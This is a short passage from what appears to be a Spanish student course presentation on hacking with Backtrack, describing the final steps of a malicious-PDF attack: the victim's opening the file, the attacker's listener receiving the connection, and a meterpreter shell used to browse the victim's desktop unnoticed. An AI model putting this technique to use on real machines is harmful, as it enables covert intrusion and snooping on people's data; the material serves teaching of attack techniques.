  • 7. MODO ESCUCHA La víctima abrirá el archivo PDF y comprobará que le sale una terminal extraña, que desaparecerá al momento. Cuando el usuario víctima ve esto, en la mayoría de los casos se despreocupa y sigue realizando las tareas que estaba haciendo, pero realmente este ha sido el momento de infección, ya que el atacante ha podido realizar la conexión. El atacante estará esperando (modo escucha) y verá cómo se crea la conexión:
  • 8. Dentro del parámetro meterpreter, ponemos “Shell” para meternos dentro del PC de la víctima, sin que éste se dé cuenta de nada. Y como podemos ver, ya estamos dentro del Desktop de la víctima: A partir de ahora podemos navegar por el PC de la víctima y realizar maldades o simplemente ser un cotilla y ver toda la información que tiene el usuario. José Mª Vellido – ASIX2M Hacking Backtrack 1 – SEGDISP Fran Pérez – 2013/2014